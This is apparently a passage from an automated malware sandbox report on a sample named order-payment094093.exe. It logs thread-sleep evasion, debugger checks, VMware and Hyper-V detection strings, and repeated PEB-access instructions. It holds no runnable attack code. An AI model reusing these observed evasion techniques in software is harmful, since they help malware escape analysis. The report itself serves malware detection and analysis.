Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 5897	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 448	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 3302	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 6639	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 877	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 9665

Source: C:\Users\user\Desktop\order-payment094093.exe	API coverage: 1.7 %
Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 2.2 %

Source: C:\Users\user\Desktop\order-payment094093.exe TID: 3260	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6516	Thread sleep count: 5373 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6060	Thread sleep count: 309 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 1280	Thread sleep time: -5534023222112862s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 2100	Thread sleep time: -1844674407370954s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5512	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 5412	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2012	Thread sleep count: 3302 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2012	Thread sleep time: -6604000s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2012	Thread sleep count: 6639 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2012	Thread sleep time: -13278000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe TID: 7160	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3108	Thread sleep count: 304 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3108	Thread sleep time: -608000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 3108	Thread sleep count: 9665 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3108	Thread sleep time: -19330000s >= -30000s

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\user\Desktop\order-payment094093.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior

Source: explorer.exe, 0000000A.00000000.2146397666.000000000962B000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000962B000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWystem32\DriverStore\en-US\msmouse.inf_locv
Source: explorer.exe, 0000000A.00000002.3327443671.00000000097F3000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 0000000A.00000002.3326839234.000000000973C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000000.2146397666.000000000973C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWws
Source: explorer.exe, 0000000A.00000000.2147208356.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}RoamingCom
Source: explorer.exe, 0000000A.00000000.2146397666.0000000009605000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: NXTVMWare
Source: explorer.exe, 0000000A.00000000.2129075558.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: #CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000A.00000000.2146397666.000000000978C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.3326839234.000000000978C000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: explorer.exe, 0000000A.00000000.2129075558.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000W
Source: explorer.exe, 0000000A.00000000.2143312911.00000000073E5000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 0000000A.00000000.2147208356.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}lnkramW6
Source: explorer.exe, 0000000A.00000000.2129075558.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 0000000A.00000000.2147208356.00000000098AD000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000
Source: explorer.exe, 0000000A.00000000.2129075558.0000000000D99000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\order-payment094093.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Roaming\NFOLsr.exe	Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe	Process queried: DebugPort

Source: C:\Users\user\Desktop\order-payment094093.exe

Code function: 9_2_00409AB0 rdtsc

9_2_00409AB0

Source: C:\Users\user\Desktop\order-payment094093.exe

Code function: 9_2_0040ACF0 LdrLoadDll,

9_2_0040ACF0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 13_2_00B779E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,

13_2_00B779E1

Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01250124 mov eax, dword ptr fs:[00000030h]	9_2_01250124
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov eax, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov ecx, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov eax, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov eax, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov ecx, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov eax, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov eax, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov ecx, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov eax, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE10E mov ecx, dword ptr fs:[00000030h]	9_2_012CE10E
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CA118 mov ecx, dword ptr fs:[00000030h]	9_2_012CA118
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CA118 mov eax, dword ptr fs:[00000030h]	9_2_012CA118
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CA118 mov eax, dword ptr fs:[00000030h]	9_2_012CA118
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CA118 mov eax, dword ptr fs:[00000030h]	9_2_012CA118
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E0115 mov eax, dword ptr fs:[00000030h]	9_2_012E0115
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B4144 mov eax, dword ptr fs:[00000030h]	9_2_012B4144
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B4144 mov eax, dword ptr fs:[00000030h]	9_2_012B4144
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B4144 mov ecx, dword ptr fs:[00000030h]	9_2_012B4144
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B4144 mov eax, dword ptr fs:[00000030h]	9_2_012B4144
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B4144 mov eax, dword ptr fs:[00000030h]	9_2_012B4144
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B8158 mov eax, dword ptr fs:[00000030h]	9_2_012B8158
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226154 mov eax, dword ptr fs:[00000030h]	9_2_01226154
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01226154 mov eax, dword ptr fs:[00000030h]	9_2_01226154
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121C156 mov eax, dword ptr fs:[00000030h]	9_2_0121C156
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01260185 mov eax, dword ptr fs:[00000030h]	9_2_01260185
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DC188 mov eax, dword ptr fs:[00000030h]	9_2_012DC188
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DC188 mov eax, dword ptr fs:[00000030h]	9_2_012DC188
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C4180 mov eax, dword ptr fs:[00000030h]	9_2_012C4180
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C4180 mov eax, dword ptr fs:[00000030h]	9_2_012C4180
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A019F mov eax, dword ptr fs:[00000030h]	9_2_012A019F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A019F mov eax, dword ptr fs:[00000030h]	9_2_012A019F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A019F mov eax, dword ptr fs:[00000030h]	9_2_012A019F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A019F mov eax, dword ptr fs:[00000030h]	9_2_012A019F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121A197 mov eax, dword ptr fs:[00000030h]	9_2_0121A197
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121A197 mov eax, dword ptr fs:[00000030h]	9_2_0121A197
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121A197 mov eax, dword ptr fs:[00000030h]	9_2_0121A197
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012F61E5 mov eax, dword ptr fs:[00000030h]	9_2_012F61E5
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012501F8 mov eax, dword ptr fs:[00000030h]	9_2_012501F8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E61C3 mov eax, dword ptr fs:[00000030h]	9_2_012E61C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E61C3 mov eax, dword ptr fs:[00000030h]	9_2_012E61C3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0129E1D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0129E1D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E1D0 mov ecx, dword ptr fs:[00000030h]	9_2_0129E1D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0129E1D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0129E1D0 mov eax, dword ptr fs:[00000030h]	9_2_0129E1D0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121A020 mov eax, dword ptr fs:[00000030h]	9_2_0121A020
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121C020 mov eax, dword ptr fs:[00000030h]	9_2_0121C020
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B6030 mov eax, dword ptr fs:[00000030h]	9_2_012B6030
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A4000 mov ecx, dword ptr fs:[00000030h]	9_2_012A4000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C2000 mov eax, dword ptr fs:[00000030h]	9_2_012C2000
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E016 mov eax, dword ptr fs:[00000030h]	9_2_0123E016
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E016 mov eax, dword ptr fs:[00000030h]	9_2_0123E016
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E016 mov eax, dword ptr fs:[00000030h]	9_2_0123E016
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E016 mov eax, dword ptr fs:[00000030h]	9_2_0123E016
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124C073 mov eax, dword ptr fs:[00000030h]	9_2_0124C073
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01222050 mov eax, dword ptr fs:[00000030h]	9_2_01222050
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A6050 mov eax, dword ptr fs:[00000030h]	9_2_012A6050
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012B80A8 mov eax, dword ptr fs:[00000030h]	9_2_012B80A8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E60B8 mov eax, dword ptr fs:[00000030h]	9_2_012E60B8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012E60B8 mov ecx, dword ptr fs:[00000030h]	9_2_012E60B8
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122208A mov eax, dword ptr fs:[00000030h]	9_2_0122208A
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121A0E3 mov ecx, dword ptr fs:[00000030h]	9_2_0121A0E3
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A60E0 mov eax, dword ptr fs:[00000030h]	9_2_012A60E0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012280E9 mov eax, dword ptr fs:[00000030h]	9_2_012280E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121C0F0 mov eax, dword ptr fs:[00000030h]	9_2_0121C0F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012620F0 mov ecx, dword ptr fs:[00000030h]	9_2_012620F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A20DE mov eax, dword ptr fs:[00000030h]	9_2_012A20DE
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A30B mov eax, dword ptr fs:[00000030h]	9_2_0125A30B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A30B mov eax, dword ptr fs:[00000030h]	9_2_0125A30B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0125A30B mov eax, dword ptr fs:[00000030h]	9_2_0125A30B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121C310 mov ecx, dword ptr fs:[00000030h]	9_2_0121C310
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01240310 mov ecx, dword ptr fs:[00000030h]	9_2_01240310
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C437C mov eax, dword ptr fs:[00000030h]	9_2_012C437C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A2349 mov eax, dword ptr fs:[00000030h]	9_2_012A2349
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A035C mov eax, dword ptr fs:[00000030h]	9_2_012A035C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A035C mov eax, dword ptr fs:[00000030h]	9_2_012A035C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A035C mov eax, dword ptr fs:[00000030h]	9_2_012A035C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A035C mov ecx, dword ptr fs:[00000030h]	9_2_012A035C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A035C mov eax, dword ptr fs:[00000030h]	9_2_012A035C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A035C mov eax, dword ptr fs:[00000030h]	9_2_012A035C
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012EA352 mov eax, dword ptr fs:[00000030h]	9_2_012EA352
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C8350 mov ecx, dword ptr fs:[00000030h]	9_2_012C8350
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121E388 mov eax, dword ptr fs:[00000030h]	9_2_0121E388
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121E388 mov eax, dword ptr fs:[00000030h]	9_2_0121E388
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121E388 mov eax, dword ptr fs:[00000030h]	9_2_0121E388
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124438F mov eax, dword ptr fs:[00000030h]	9_2_0124438F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0124438F mov eax, dword ptr fs:[00000030h]	9_2_0124438F
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01218397 mov eax, dword ptr fs:[00000030h]	9_2_01218397
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01218397 mov eax, dword ptr fs:[00000030h]	9_2_01218397
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01218397 mov eax, dword ptr fs:[00000030h]	9_2_01218397
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012303E9 mov eax, dword ptr fs:[00000030h]	9_2_012303E9
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0123E3F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0123E3F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0123E3F0 mov eax, dword ptr fs:[00000030h]	9_2_0123E3F0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012563FF mov eax, dword ptr fs:[00000030h]	9_2_012563FF
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012DC3CD mov eax, dword ptr fs:[00000030h]	9_2_012DC3CD
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0122A3C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0122A3C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0122A3C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0122A3C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0122A3C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0122A3C0 mov eax, dword ptr fs:[00000030h]	9_2_0122A3C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012283C0 mov eax, dword ptr fs:[00000030h]	9_2_012283C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012283C0 mov eax, dword ptr fs:[00000030h]	9_2_012283C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012283C0 mov eax, dword ptr fs:[00000030h]	9_2_012283C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012283C0 mov eax, dword ptr fs:[00000030h]	9_2_012283C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012A63C0 mov eax, dword ptr fs:[00000030h]	9_2_012A63C0
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE3DB mov eax, dword ptr fs:[00000030h]	9_2_012CE3DB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE3DB mov eax, dword ptr fs:[00000030h]	9_2_012CE3DB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE3DB mov ecx, dword ptr fs:[00000030h]	9_2_012CE3DB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012CE3DB mov eax, dword ptr fs:[00000030h]	9_2_012CE3DB
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C43D4 mov eax, dword ptr fs:[00000030h]	9_2_012C43D4
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012C43D4 mov eax, dword ptr fs:[00000030h]	9_2_012C43D4
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121823B mov eax, dword ptr fs:[00000030h]	9_2_0121823B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224260 mov eax, dword ptr fs:[00000030h]	9_2_01224260
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224260 mov eax, dword ptr fs:[00000030h]	9_2_01224260
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_01224260 mov eax, dword ptr fs:[00000030h]	9_2_01224260
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_0121826B mov eax, dword ptr fs:[00000030h]	9_2_0121826B
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
Source: C:\Users\user\Desktop\order-payment094093.exe	Code function: 9_2_012D0274 mov eax, dword ptr fs:[00000030h]	9_2_012D0274
